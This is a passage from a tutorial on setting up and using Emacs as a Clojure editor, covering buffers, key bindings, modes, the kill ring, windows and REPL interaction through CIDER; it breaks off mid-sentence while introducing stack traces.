In order to be able to handle the event that it has been passed, the view must have in place an event listener. The Android View class, from which all user interface components are derived, contains a range of event listener interfaces, each of which contains an abstract declaration for a callback method. In order to be able to respond to an event of a particular type, a view must register the appropriate event listener and implement the corresponding callback. For example, if a button is to respond to a click event (the equivalent to the user touching and releasing the button view as though clicking on a physical button) it must both register the View.onClickListener event listener (via a call to the target view’s setOnClickListener() method) and implement the corresponding onClick() callback method. In the event that a “click” event is detected on the screen at the location of the button view, the Android framework will call the onClick() method of that view when that event is removed from the event queue. It is, of course, within the implementation of the onClick() callback method that any tasks should be performed or other methods called in response to the button click.
Using the android:onClick Resource
Before exploring event listeners in more detail it is worth noting that a shortcut is available when all that is required is for a callback method to be called when a user “clicks” on a button view in the user interface. Consider a user interface layout containing a button view named button1 with the requirement that when the user touches the button, a method called buttonClick() declared in the activity class is called. All that is required to implement this behavior is to write the buttonClick() method (which takes as an argument a reference to the view that triggered the click event) and add a single line to the declaration of the button view in the XML file. For example:
<Button android:
This provides a simple way to capture click events. It does not, however, provide the range of options offered by event handlers, which are the topic of the rest of this chapter.
Event Listeners and Callback Methods
- onClickListener – Used to detect click style events whereby the user touches and then releases an area of the device display occupied by a view. Corresponds to the onClick() callback method which is passed a reference to the view that received the event as an argument.
- onLongClickListener – Used to detect when the user maintains the touch over a view for an extended period. Corresponds to the onLongClick() callback method which is passed the view that received the event as an argument.
- onTouchListener – Used to detect any form of contact with the touch screen including individual or multiple touches and gesture motions. Corresponding with the onTouch() callback, this topic will be covered in greater detail in the chapter entitled Android Touch and Multi-touch Event Handling. The callback method is passed the view that received the event and a MotionEvent object as arguments.
- onCreateContextMenuListener – Listens for the creation of a context menu as the result of a long click. Corresponds to the onCreateContextMenu() callback method. The callback is passed the menu, the view that received the event and a menu context object.
- onFocusChangeListener – Detects when focus moves away from the current view as the result of interaction with a track-ball or navigation key. Corresponds to the onFocusChange() callback method which is passed the view that received the event and a Boolean value to indicate whether focus was gained or lost.
- onKeyListener – Used to detect when a key on a device is pressed while a view has focus. Corresponds to the onKey() callback method. Passed as arguments are the view that received the event, the KeyCode of the physical key that was pressed and a KeyEvent object.
An Event Handling Example
In the remainder of this chapter, we will work through the creation of a simple application designed to demonstrate the implementation of an event listener and callback method to detect when the user has clicked on a button. The code within the callback method will update a text view to indicate that the event has been processed.
Launch Eclipse and create an Android Application Project named EventExample with the appropriate package name and SDK selections. As with previous examples, request the creation of a blank activity and the use of the default launcher icons. On the New Blank Activity screen of the New Android Application wizard, set the Activity Name to EventExampleActivity, the Layout Name to activity_event_example and the Fragment Layout to fragment_event_example.
Designing the User Interface
The user interface layout for the EventExampleActivity class in this example is to consist of a RelativeLayout view, a Button and a TextView as illustrated in Figure 17-1.
Figure 17-1
Locate and select the fragment_event_example.xml file created by Eclipse (located in the Package Explorer under EventExample -> res -> layout -> fragment_event_example.xml) and double click on it to load it into the editing panel. Switch from the Graphical Layout tool to the XML file using the tab at the bottom of the editing panel and delete the current content of the file. With a blank canvas, either use the Graphical Layout tool to design the user interface from Figure 17-1 (making sure to change the IDs of the Button and TextView objects to myButton and myTextView respectively), or directly enter the following XML into the editor:
<RelativeLayout xmlns: <Button android: <TextView android: </RelativeLayout>
Within the Graphical Layout tool, right-click on the Button view and select the Edit Text… menu option. In the Resource Chooser dialog, click on the New String… button and in the Create New Android String dialog, enter Press Me into the String field and mybutton_string into the New R.string field:
Figure 17-2
Click on OK in the new android string dialog to create the new string resource and then again in the resource chooser dialog to assign the string to the button view.
Repeat these steps on the TextView object to create a new string resource named mytextview_string with a string that reads “Status”. Be sure to save the file once the changes are complete.
With the user interface layout now completed, the next step is to register the event listener and callback method.
The Event Listener and Callback Method
For the purposes of this example, an onClickListener needs to be registered for the myButton view. This is achieved by making a call to the setOnClickListener() method of the button view, passing through a new onClickListener object as an argument and implementing the onClick() callback method. Since this is a task that only needs to be performed when the activity is created, a good option is to override the onStart() lifecycle method of the EventExampleActivity class.
Within the Package Explorer panel, navigate to the EventExampleActivity.java file (src -> <package name> -> EventExampleActivity.java) and double click on it to load it into the code editor. Once loaded, locate implement the onStart() method to obtain a reference to the button view, register the event listener and implement the onClick() callback method:
package com.example.eventexample; import android.app.Activity; import android.app.ActionBar; import android.app.Fragment; import android.os.Bundle; import android.view.LayoutInflater; import android.view.Menu; import android.view.MenuItem; import android.view.View; import android.view.ViewGroup; import android.os.Build; import android.widget.Button; import android.widget.TextView; public class EventExampleActivity extends Activity { . . . @Override protected void onStart() { super.onStart(); Button button = (Button)findViewById(R.id.myButton); button.setOnClickListener( new Button.OnClickListener() { public void onClick(View v) { } } ); } . . . }
The above code has now registered the event listener on the button and implemented the onClick() method. If the application were to be run at this point, however, there would be no indication that the event listener installed on the button was working since there is, as yet, no code implemented within the body of the onClick() callback method. The goal for the example is to have a message appear on the TextView when the button is clicked, so some further code changes need to be made:
@Override protected void onStart() { super.onStart();"); } } ); }
Complete this phase of the tutorial by compiling and running the application on either an AVD emulator or physical Android device. On touching and releasing the button view (otherwise known as “clicking”) the text view should change to display the “Button clicked” text.
Consuming Events
The detection of standard clicks (as opposed to long clicks) on views is a very simple case of event handling. The example will now be extended to include the detection of long click events which occur when the user clicks and holds a view on the screen and, in doing so, cover the topic of event consumption.
Consider the code for the onClick() method in the above section of this chapter. The callback is declared as void and, as such, does not return a value to the Android framework after it has finished executing.
The onLongClick() callback method of the onLongClickListener interface, on the other hand, is required to return a Boolean value to the Android framework. The purpose of this return value is to indicate to the Android runtime whether the callback has consumed the event or not. If the callback returns a true value, the event is discarded by the framework. If, on the other hand, the callback returns a false value the Android framework will consider the event still to be active and will consequently pass it along to the next matching event listener that is registered on the same view.
As with many programming concepts this is, perhaps, best demonstrated with an example. The first step is to add an event listener and callback method for long clicks to the button view in the example activity:
@Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_event_example);"); } } ); button.setOnLongClickListener( new Button.OnLongClickListener() { public boolean onLongClick(View v) { TextView myTextView = (TextView)findViewById(R.id.myTextView); myTextView.setText("Long button click"); return true; } } ); }
Clearly, when a long click is detected, the onLongClick() callback method will display “Long button click” on the text view. Note, however, that the callback method also returns a value of true to indicate that it has consumed the event. Compile and run the application and press and hold a fingertip over the button view until the “Long button click” text appears in the text view. On releasing the button, the text view continues to display the “Long button click” text indicating that the onClick() callback method was not called.
Next, modify the code such that the onLongClick() method now returns a false value:
button.setOnLongClickListener( new Button.OnLongClickListener() { public boolean onLongClick(View v) { TextView myTextView = (TextView)findViewById(R.id.myTextView); myTextView.setText("Long button click"); return false; } } );
Once again, compile and run the application and perform a long click on the button until the long click message appears. Upon releasing the button this time, however, note that the onClick() callback is also triggered and the text changes to “Button click”. This is because the false value returned by the onLongClick() callback method indicated to the Android framework that the event was not consumed by the method and was eligible to be passed on to the next registered listener on the view. In this case, the runtime ascertained that the onClickListener on the button was also interested in events of this type and subsequently called the onClick() callback method.
Summary
A user interface is of little practical use if the views it contains do not do anything in response to user interaction. is called. The callback method then performs any tasks required by the activity before returning. Some callback methods are required to return a Boolean value to indicate whether the event needs to be passed on to any other event listeners registered on the view or discarded by the system.
Having covered the basics of event handling, the next chapter will explore in some depth the topic of touch events with a particular emphasis on handling multiple touches.
|
https://www.techotopia.com/index.php?title=An_Overview_and_Example_of_Android_Event_Handling&oldid=29532
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
You have now learned the fundamental structure of methods, but there are still many other features you have to learn. For example, take the code below that was shown in lesson 1 (What is Programming).
public static String toBaseN(int num, int base) { String newNum = ""; while (num > 0) { int result = num % base; newNum = result + newNum; num /= base; } return newNum; }
This method converts a number to a different base. In this lesson, we cover how are we supposed to use this method. In order to make this method run, we have to add a method call somewhere else in the program. Here is the structure of a method call:
Below, there is a main method with a bolded method call to the method
toBaseN(int num, int base).
public static void main(String[] args) { String newValue = toBaseN(55, 2); System.out.println(newValue); // will output 110111 }
The method name signals the computer as to which method is being used, and the parameters list provides the specific inputs needed for that method. If the method has no parameters, the parameter list is left empty. For example, if the method
toBaseN(int num, int base) had no parameters, the method call would be:
toBaseN();
Note: The method calls
toBaseN(55, 2) and
toBaseN() only work if it is being called in the same class. Since classes have not been covered, and we have only worked in one class so far, simply understand this syntax only works when working in a single class.
Finally, method overloading is used when you want to methods to have the same name and they have different parameter lists. Below is an example of two methods that demonstrate this idea:
// adds the word two to the end of a string public String addTwo(String str) { return (str + " two"); } // adds the number two to an integer public int addTwo(int num) { return (num + 2); }
Both of these methods may be useful, and both are appropriately named
addTwo, so method overloading is brought into effect. Now, it is useful to note that method overloading is caused by different parameters, not by different return types. Method overloading still works when the methods have the same return types, but does not work when they have the same parameters. Below is an example of an invalid overloading method:
// adds the word two to the end of a string public String addTwo(String str) { return (str + " two"); } // adds the number two to the end of a string public int addTwo(String num) { return (num + 2); }
A method call of
addTwo in the above scenario would result in an error because they have the same parameter type (
String). Method calls and the concept of method overloading are both important to understanding how to create and use methods.
Lesson Quiz
1. What is method overloading?
2. What is wrong with the code below?
public static int addTwo(int num) { return (num + 2); } public static void main(String[] args) { System.out.println(addTwo()); }
Written by Chris Elliott
Notice any mistakes? Please email us at [email protected] so that we can fix any inaccuracies.
|
https://teamscode.com/learn/ap-computer-science/advanced-methods/
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
Plugins grant unlimited opportunity to perform customizations within the webpack build system. This allows you to create custom asset types, perform unique build modifications, or even enhance the webpack runtime while using middleware. The following are some features of webpack that become useful while writing plugins.
After a compilation is sealed, all structures within the compilation may be traversed.
class MyPlugin { apply(compiler) { compiler.hooks.emit.tapAsync('MyPlugin', (compilation, callback) => { // Explore each chunk (build output): compilation.chunks.forEach(chunk => { // Explore each module within the chunk (built inputs): chunk.modules.forEach(module => { // Explore each source file path that was included into the module: module.fileDependencies.forEach(filepath => { // we've learned a lot about the source structure now... }); }); // Explore each asset filename generated by the chunk: chunk.files.forEach(filename => { // Get the asset source for each file generated by the chunk: var source = compilation.assets[filename].source(); }); }); callback(); }); } } module.exports = MyPlugin;
compilation.modules: An array of modules (built inputs) in the compilation. Each module manages the build of a raw file from your source library.
module.fileDependencies: An array of source file paths included into a module. This includes the source JavaScript file itself (ex:
index.js), and all dependency asset files (stylesheets, images, etc) that it has required. Reviewing dependencies is useful for seeing what source files belong to a module.
compilation.chunks: An array of chunks (build outputs) in the compilation. Each chunk manages the composition of a final rendered assets.
chunk.modules: An array of modules that are included into a chunk. By extension, you may look through each module's dependencies to see what raw source files fed into a chunk.
chunk.files: An array of output filenames generated by the chunk. You may access these asset sources from the
compilation.assetstable.
While running webpack middleware, each compilation includes a
fileDependencies array (what files are being watched) and a
fileTimestamps hash that maps watched file paths to a timestamp. These are extremely useful for detecting what files have changed within the compilation:
class MyPlugin { constructor() { this.startTime = Date.now(); this.prevTimestamps = {}; } apply(compiler) { compiler.hooks.emit.tapAsync('MyPlugin', (compilation, callback) => { var changedFiles = Object.keys(compilation.fileTimestamps).filter( watchfile => { return ( (this.prevTimestamps[watchfile] || this.startTime) < (compilation.fileTimestamps[watchfile] || Infinity) ); } ); this.prevTimestamps = compilation.fileTimestamps; callback(); }); } } module.exports = MyPlugin;
You may also feed new file paths into the watch graph to receive compilation triggers when those files change. Simply push valid file paths into the
compilation.fileDependencies array to add them to the watch. Note: the
fileDependencies array is rebuilt in each compilation, so your plugin must push its own watched dependencies into each compilation to keep them under watch.
Similar to the watch graph, it's fairly simple to monitor changed chunks (or modules, for that matter) within a compilation by tracking their hashes.
class MyPlugin { constructor() { this.chunkVersions = {}; } apply(compiler) { compiler.hooks.emit.tapAsync('MyPlugin', (compilation, callback) => { var changedChunks = compilation.chunks.filter(chunk => { var oldVersion = this.chunkVersions[chunk.name]; this.chunkVersions[chunk.name] = chunk.hash; return chunk.hash !== oldVersion; }); callback(); }); } } module.exports = MyPlugin;
|
https://webpack.js.org/contribute/plugin-patterns/
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
sw/source/filter/xml/xmltbli.cxx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
New commits: commit 7749e10198dc1ca49f39955a706209da65a818c4 Author: Stephan Bergmann <sberg...@redhat.com> Date: Fri Feb 9 09:32:06 2018 +0100 ...and Clang is not affected at all (It wouldn't really hurt to have the line enabled for more toolchains than necessary, as redeclaration of static constexpr data members outside the class is still supported for backwards-compatibility in C++17, though deprecated. However, recording a precise upper bound on toolchains in the #if allows to eventually get rid of this code, once we no longer support any affected toolchain.) Change-Id: I40ae37e7006754cc89538d5c97230200a2ca633c Reviewed-on: Tested-by: Jenkins <c...@libreoffice.org> Reviewed-by: Stephan Bergmann <sberg...@redhat.com> diff --git a/sw/source/filter/xml/xmltbli.cxx b/sw/source/filter/xml/xmltbli.cxx index 5159cc92b6dd..c7997b0fb16e 100644 --- a/sw/source/filter/xml/xmltbli.cxx +++ b/sw/source/filter/xml/xmltbli.cxx @@ -1228,7 +1228,7 @@ public: } }; -#if __cplusplus <= 201402 || (defined __GNUC__ && __GNUC__ <= 6) +#if __cplusplus <= 201402 || (defined __GNUC__ && __GNUC__ <= 6 && !defined __clang__) constexpr sal_Int32 SwXMLTableContext::MAX_WIDTH; #endif _______________________________________________ Libreoffice-commits mailing list libreoffice-comm...@lists.freedesktop.org
|
https://www.mail-archive.com/libreoffice@lists.freedesktop.org/msg208774.html
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
(setq initial-frame-alist '((top . 0) (left . 0) (width . 120) (height . 80)))
How to Use Emacs, an Excellent Clojure Editor
On your journey to Clojure mastery, your editor will be your closest ally. I highly recommend working with Emacs, but you can, of course, use any editor you want. If you don’t follow the thorough Emacs instructions in this chapter, or if you choose to use a different editor, it’s worthwhile to at least invest some time in setting up your editor to work with a REPL. Two alternatives that I recommend and that are well regarded in the community are Cursive and Nightcode.
The reason I recommend Emacs is that it offers tight integration with a Clojure REPL, which allows you to instantly try out your code as you write. That kind of tight feedback loop will be useful while learning Clojure and, later, when writing real Clojure programs. Emacs is also great for working with any Lisp dialect; in fact, Emacs is written in a Lisp dialect called Emacs Lisp (elisp).
By the end of this chapter, your Emacs setup will look something like Figure 2-1.
To get there, you’ll start by installing Emacs and setting up a new-person-friendly Emacs configuration. Then you’ll learn the basics: how to open, edit, and save files, and how to interact with Emacs using essential key bindings. Finally, you’ll learn how to actually edit Clojure code and interact with the REPL.
Installation
You should use the latest major version of Emacs, Emacs 24, for the platform you’re working on:
- OS X Install vanilla Emacs as a Mac app from. Other options, like Aquamacs, are supposed to make Emacs more “Mac-like,” but they’re problematic in the long run because they’re set up so differently from standard Emacs that it’s difficult to use the Emacs manual or follow along with tutorials.
- Ubuntu Follow the instructions at.
- Windows You can find a binary at. After you download and unzip the latest version, you can run the Emacs executable under bin\runemacs.exe.
After you’ve installed Emacs, open it. You should see something like Figure 2-2.
Welcome to the cult of Emacs! You’ve made Richard Stallman proud!
Configuration
I’ve created a repository of all the files you need to configure Emacs for Clojure, available at.
NOTE: These tools are constantly being updated, so if the instructions below don't work for you or you want to use the latest configuration, please read the instructions at.
Do the following to delete your existing Emacs configuration and install the Clojure-friendly one:
- Close Emacs.
- Delete ~/.emacs or ~/.emacs.d if they exist. (Windows users, your emacs files will probably live in C:\Users\your_user_name\AppData\Roaming\. So, for example, you would delete C:\Users\jason\AppData\Roaming\.emacs.d.) This is where Emacs looks for configuration files, and deleting these files and directories will ensure that you start with a clean slate.
- Download the Emacs configuration zip file listed above and unzip it. Its contents should be a folder, emacs-for-clojure-book1. Run mv path/to/emacs-for-clojure-book1 ~/.emacs.d.
- Open Emacs.
When you open Emacs, you may see a lot of activity as Emacs downloads a bunch of useful packages. Once the activity stops, go ahead and just quit Emacs, and then open it again. (If you don't see any activity, that's OK! Quit and restart Emacs just for funsies.) After you do so, you should see a window like the one in Figure 2-3.
Now that we’ve got everything set up, let’s learn how to use Emacs!
Emacs Escape Hatch
Before we dig in to the fun stuff, you need to know an important Emacs key binding: ctrl-G. This key binding quits whatever Emacs command you’re trying to run. So if things aren’t going right, hold down ctrl, press G, and then try again. It won’t close Emacs or make you lose any work; it’ll just cancel your current action.
Emacs Buffers
All editing happens in an Emacs buffer. When you first start Emacs, a buffer named
*scratch* is open. Emacs will always show you the name of the current buffer at the bottom of the window, as shown in Figure 2-4.
By default, the
*scratch* buffer handles parentheses and indentation in a way that’s optimal for Lisp development but is inconvenient for writing plain text. Let’s create a fresh buffer so we can play around without having unexpected things happen. To create a buffer, do this:
- Hold down ctrl and press X.
- Release ctrl.
- Press B.
We can express the same sequence in a more compact format: C-x b.
After performing this key sequence, you’ll see a prompt at the bottom of the application, as shown in Figure 2-5.
This area is called the minibuffer, and it is where Emacs prompts you for input. Right now it’s prompting us for a buffer name. You can enter the name of a buffer that is already open, or you can enter a new buffer name. Type in emacs-fun-times and press enter. You should now see a completely blank buffer and can just start typing. You’ll find that keys mostly work the way you’d expect. Characters appear as you type them. The up, down, left, and right arrow keys move you as you’d expect, and enter creates a new line.
You’ll also notice that you’re not suddenly sporting a bushy Unix beard or Birkenstocks (unless you had them to begin with). This should help ease any lingering trepidation you feel about using Emacs. When you’re done messing around, go ahead and kill the buffer by typing C-x k enter. ; buffers aren’t necessarily backed by files, and creating a buffer doesn’t necessarily create a file. Let’s learn about working with files.
Working with Files
The key binding for opening a file in Emacs is C-x C-f. Notice that you’ll need to hold down ctrl when pressing both X and F. After you do that, you’ll get another minibuffer prompt. Navigate to ~/.emacs.d/customizations/ui.el, which customizes the way Emacs looks and how you can interact with it. Emacs opens the file in a new buffer with the same name as the filename. Let’s go to line 37 and uncomment it by removing the leading semicolons. It will look like this:
Then change the values for
width and
height, which set the dimensions in characters for the active window. By changing these values, you can set the Emacs window to open at a certain size every time it starts. Try/customizations/ui.el. You can also try saving your buffer using the key binding you use in other applications (for example, ctrl-S or cmd-S). The Emacs configuration you downloaded should allow that to work, but if it doesn’t, it’s no big deal.
After saving the file, quit Emacs and start it again. I bet it’s very tiny! See my example in Figure 2-6.
Go through that same process a couple of times until Emacs starts at a size that you like. Or just comment out those lines again and be done with it (in which case Emacs will open at its default width and height). If you’re done editing ui.el, you can close its buffer with C-x k. Either way, you’re done saving your first file in Emacs! If something crazy happens, you can follow the instructions in “Configuration” on page 13 to get Emacs working again.
If you want to create a new file, just use, use C-x b and enter the buffer name in the minibuffer.
- To create a new buffer, use C-x b and enter a new buffer name.
- To open a file, use C-x C-f and navigate to the file.
- To save a buffer to a file, use C-x C-s.
- To create a new file, use C-x C-f and enter the new file’s path. When you save the buffer, Emacs will create the file on the filesystem.
Key Bindings and Modes
You’ve already come a long way! You can now use Emacs like a very basic editor. This should help you get by if you ever need to use Emacs on a server or are forced into pairing with an Emacs nerd.
However, to really be productive, it’ll be useful for you to know some key details about key bindings (ha-ha!). Then I’ll introduce Emacs modes. After that, I’ll cover some core terminology and go over a bunch of super useful Emacs goes even further than that. Even simple keystrokes like f and a are bound to a function, in this case
self-insert-command, the command for adding characters to the buffer you’re editing.
From Emacs’s point of view, all functions are created equal, and you can redefine all functions, even core functions like
save-file. You probably won’t want to redefine core functions, but you can.
You can redefine functions because, at its core, Emacs is just a Lisp interpreter that happens to load code-editing facilities. Most of Emacs is written in elisp, so from the perspective of Emacs,
save-file is just a function, as is
switch-to-buffer and almost any other command you can run. Not only that, but any functions you create are treated the same way as built-in functions. You can even use Emacs to execute elisp, modifying Emacs as it runs.
The freedom to modify Emacs using a powerful programming language is what makes Emacs so flexible and why people like me are so crazy about it. Yes, it has a lot of surface-level complexity that can take time to learn. But underlying Emacs is the elegant simplicity of Lisp and the infinite tinkerability that comes with it. This tinkerability isn’t limited to just creating and redefining functions. You can also create, redefine, and remove key bindings. Conceptually, key bindings are just an entry in a lookup table associating keystrokes with functions, and that lookup table is completely modifiable.
You can also run commands by name, without a specific key binding, using M-x function-name (for example, M-x save-buffer). M stands for meta, a key that modern keyboards don’t possess but which is mapped to alt on Windows and Linux and option on Macs. M-x runs the
smex command, which prompts you for the name of another command to be run.
Now that you understand key bindings and functions, you’ll be able to understand what modes are and how they work.
Modes
An Emacs mode is a collection of key bindings and functions that are packaged together to help you be productive when editing different types of files. (Modes also do things like tell Emacs how to do syntax highlighting, but that’s of secondary importance, and I won’t cover that here.)
For example, when you’re editing a Clojure file, you’ll want to load Clojure mode. Right now I’m writing a Markdown file and using Markdown mode, which has lots of useful key bindings specific to working with Markdown. When editing Clojure, it’s best to have a set of Clojure-specific key bindings, like C-c C-k to load the current buffer into a REPL and compile it.
Modes come in two flavors: major modes and minor modes. Markdown mode and Clojure mode are major modes. Major modes are usually set by Emacs when you open a file, but you can also set the mode explicitly by running the relevant Emacs command, for example with
M-x clojure-mode or M-x major-mode. Only one major mode is active at a time.M-x clojure-mode or M-x major-mode. Only one major mode is active at a time.
Whereas major modes specialize Emacs for a certain file type or language, minor modes usually provide functionality that’s useful across file types. For example, abbrev mode “automatically expands text based on pre-defined abbreviation definitions” (per the Emacs manual1.). You can have multiple minor modes active at the same time.
You can see which modes are active on the mode line, as shown in Figure 2-7.
If you open a file and Emacs doesn’t load a major mode for it, chances are that one exists. You’ll just need to download its package. Speaking of which . . .
Installing Packages
Many modes are distributed as packages, which are just bundles of elisp files stored in a package repository. Emacs 24, which you installed at the beginning of this chapter,. The “Beginner’s Guide to Emacs” (found at) has a good description of how to load customizations under the section “Loading New Packages” toward the bottom of the article.
Core Editing Terminology and Key Bindings
If all you want to do is use Emacs like a text editor, you can skip this section entirely! But you’ll be missing out on some great stuff. In this section, we’ll go over key Emacs terms; how to select, cut, copy, and paste text; how to select, cut, copy, and paste text (see what I did there? Ha ha ha!); and how to move through the buffer efficiently.
To get started, open a new buffer in Emacs and name it jack-handy. Then enter the following Jack Handy quotations:.
Use this example to experiment with navigation and editing in this section.
Point
If you’ve been following along, you should see a red-orange use C-k, all the text from the letter f onward will disappear. C-k runs the command
kill-line, which kills all text after point on the current line (I’ll talk more about killing later). Undo that change with C-/. Also, try your normal OS key binding for undo; that should work as well.
Movement
You can use your arrow keys to move point just like any other editor, but many key bindings allow you to navigate more efficiently, as shown in Table 2-1.
- Table 2-1: Key Bindings for Navigating Text
Go ahead and try out these key bindings in your jack-handy buffer!
Selection with Regions
In Emacs, we don’t select text. We create regions, and we do so by setting the mark with C-spc (ctrl-spacebar). Then, when you move point, everything between mark and point is the region. It’s very similar to shift-selecting text for basic purposes.
For example, do the following in your jack-handy buffer:
- Go to the beginning of the file.
- Use C-spc.
- Use M-f twice. shift.
Regions also let you confine an operation to a limited area of the buffer. Try this:
- Create a region encompassing The face of a child can say it all.
- Use M-x replace-string and replace face with head.
This will perform the replacement within the current region rather than the entire buffer after point, which is the default behavior. the kill ring. Don’t you feel braver and truer knowing that you’re laying waste to untold kilobytes of text? We important, Emacs allows you to do tasks that you can’t do with the typical cut/copy/paste clipboard featureset.
Emacs stores multiple blocks of text on the kill ring, and you can cycle through them. This is cool because you can cycle through to retrieve text you killed a long time ago. Let’s see this in action:
- Create a region over the word Treasure in the first line.
- Use M-w, which is bound to the
kill-ring-savecommand. In general, M-w is like copying. It adds the region to the kill ring without deleting it from your buffer.
- Move point to the word choreography on the last line.
- Use M-d, which is bound to the
kill-wordcommand. This adds choreography to the kill ring and deletes it from your buffer.
- Use C-y. This will yank the text you just killed, choreography, inserting it at point.
- Use M-y. This will remove choreography and yank the next item on the kill ring, Treasure.
You can see some useful kill/yank key bindings in Table 2-2.
- Table 2-2: Key Bindings for Killing and Yanking Text
Editing and Help
Table 2-3 shows some additional, useful, editing key bindings you should know about for dealing with spacing and expanding text.
- Table 2-3: Other Useful Editing Key Bindings
Emacs also has excellent built-in help. The two key bindings shown in Table 2-4 will serve you well.
- Table 2-4: Key Bindings for Built-in Help
The help text appears in a new window, a concept I will cover later in the chapter. For now, you can close help windows by pressing C-x o q.
Using Emacs with Clojure
Next, I’ll explain how to use Emacs to efficiently develop a Clojure application. You’ll learn how to start a REPL process that’s connected to Emacs and how to work with Emacs windows. Then I’ll cover a cornucopia of useful key bindings for evaluating expressions, compiling files, and performing other handy tasks. Finally, I’ll show you how to handle Clojure errors and introduce some features of Paredit, an optional minor mode, which is useful for writing and editing code in Lisp-style languages.
If you want to start digging in to Clojure code, please do skip ahead! You can always return later.
Fire Up Your REPL!
As you learned in Chapter 1, a REPL allows you to interactively write and run Clojure code. The REPL is a running Clojure program that gives you a prompt and then reads your input, evaluates it, prints the result, and loops back to the prompt. In Chapter 1, you started the REPL in a terminal window with
lein repl. In this section, you’ll start a REPL directly in Clojure.
To connect Emacs to a REPL, you’ll use the Emacs packageCIDER, available at. If you followed the configuration instructions earlier in this chapter, you should already have it installed, but you can also install it by running M-x package-install, entering cider, and pressing enter.
CIDER allows you to start a REPL within Emacs and provides you with key bindings that allow you to interact with the REPL more efficiently. Go ahead and start a REPL session now. Using Emacs, open the file clojure-noob/src/clojure_noob/core.clj, which you created in Chapter 1. Next, use M-x cider-jack-in. This starts the REPL and creates a new buffer where you can interact with it. After a short wait (it should be less than a minute), you should see something like Figure 2-8.
Now we have two windows: our core.clj file is open on the left, and the REPL is running on the right. If you’ve never seen Emacs split in half like this, don’t worry! I’ll talk about how Emacs splits windows in a second. In the meantime, try evaluating some code in the REPL. Type in the following bolded lines. The result that you should see printed in the REPL when you press enter is shown after each line of code. Don’t worry about the code at this time; I’ll cover all these functions in the next chapter.
(+ 1 2 3 4) ; => 10 (map inc [1 2 3 4]) ; => (2 3 4 5) (reduce + [5 6 100]) ; => 111
Pretty nifty! You can use this REPL just as you used
lein repl in the first chapter. You can also do a whole lot more, but before I go into that, I’ll explain how to work with split-screen Emacs.
Interlude: Emacs Windows and Frames
Let’s take a quick detour to talk about how Emacs handles frames and windows, and to go over some useful window-related key bindings. Feel free to skip this section if you’re already familiar with Emacs windows.
Emacs was invented in, like, 1802 or something, so it uses terminology slightly different from what you’re used to. What you would normally refer to as a window, Emacs calls a frame, and the frame can be split into multiple windows. Splitting into multiple windows allows you to view more than one buffer at a time. You already saw this happen when you ran
cider-jack-in (see Figure 2-9).
Table 2-5 shows several key bindings for working with the frame and windows.
- Table 2-5: Emacs Window Key Bindings
I encourage you to try the Emacs window key bindings. For example, put your cursor in the left window, the one with the Clojure file, and use C-x 1. The other window should disappear, and you should see only the Clojure code. Then do the following:
- Use C-x 3 to split the window side by side again.
- Use C-x o to switch to the right window.
- Use C-x b *cider-repl* to switch to the CIDER buffer in the right window.
Once you’ve experimented a bit, set up Emacs so that it contains two side-by-side windows with Clojure code on the left and the CIDER buffer on the right, as in the previous images. If you’re interested in learning more about windows and frames, the Emacs manual has a ton of info: see.
Now that you can navigate Emacs windows, it’s time to learn some Clojure development key bindings!
A Cornucopia of Useful Key Bindings
Now you’re ready to learn some key bindings that will reveal the true power of using Emacs for Clojure projects. These commands will let you evaluate, tweak, compile, and run code with just a few dainty keystrokes. Let’s start by going over how to quickly evaluate an expression.
At the bottom of core.clj, add the following:
(println "Cleanliness is next to godliness")
Now use C-e to navigate to the end of the line, and then use C-x C-e.The text
Cleanliness is next to godliness should appear in the CIDER buffer, as shown in Figure 2-10.
The key binding C-x C-e runs the command
cider-eval-last-expression. As the name suggests, this command sends the expression immediately preceding point to the REPL, which then evaluates the expression. You can also try C-u C-x C-e, which prints the result of the evaluation after point.
Now let’s try to run the
-main function we wrote in Chapter 1 so we can let the world know that we’re little teapots.
In the core.clj buffer, use C-c M-n M-n. This key binding sets the namespace to the namespace listed at the top of your current file, so the prompt in the right window should now read
clojure-noob.core>. I haven’t gone into detail about namespaces yet, but for now it’s enough to know that a namespace is an organizational mechanism that allows us to avoid naming conflicts. Next, enter (-main) at the prompt. The REPL should print
I'm a little teapot! How exciting!
Now let’s create a new function and run it. At the bottom of core.clj, add the following:
(defn train [] (println "Choo choo!"))
When you’re done, save your file and use C-c C-k to compile your current file within the REPL session. (You have to compile your code for the REPL to be aware of your changes.) Now if you run
(train) in the REPL, it will echo back
Choo choo!.
While still in the REPL, try C-↑ (ctrl plus the up arrow key). C-↑ and C-↓ cycle through your REPL history, which includes all the Clojure expressions that you’ve asked the REPL to evaluate.
Note for Mac users: by default, OS X maps C-↑, C-↓, C-←, and C-→ to Mission Control commands. You can change your Mac key bindings by opening System Preferences, and then going to Keyboard4Shortcuts4Mission Control.
Finally, try this:
- Type (-main at the REPL prompt. Note the lack of a closing parenthesis.
- Press C-enter.
CIDER should close the parenthesis and evaluate the expression. This is just a nice little convenience that CIDER provides for dealing with so many parentheses.
CIDER also has a few key bindings that are great when you’re learning Clojure. Pressing C-c C-d C-d will display documentation for the symbol under point, which can be a huge time-saver. When you’re done with the documentation, press q to close the documentation buffer. The key binding M-. will navigate to the source code for the symbol under point, and M-, will return you to your original buffer and position. Finally, C-c C-d C-a lets you search for arbitrary text across function names and documentation. This is a great way to find a function when you can’t exactly remember its name.
The CIDER README () has a comprehensive list of key bindings that you can learn over time, but for now, Tables 2-6 and 2-7 contain a summary of the key bindings we just went over.
- Table 2-6: Clojure Buffer Key Bindings
- Table 2-7: CIDER Buffer Key Bindings
How to Handle Errors
In this section, you’ll write some buggy code so you can see how Emacs responds to it and how you can recover from the error and continue on your merry way. You’ll do this in both the REPL buffer and the core.clj buffer. Let’s start with the REPL. At the prompt, type (map) and press enter. You should see something like Figure 2-11.
As you can see, calling
map with no arguments causes Clojure to lose its mind—it shows an
ArityException error message in your REPL buffer and fills your left window with text that looks like the ravings of a madman. These ravings are the stack trace, which shows the function that actually threw the exception, along with which function called that function, down the stack of function calls.
Clojure’s stack traces can be difficult to decipher when you’re just starting, but after a while you’ll learn to get useful information from them. CIDER gives you a hand by allowing you to filter stack traces, which reduces noise so you can zero in on the cause of your exception. Line 2 of the
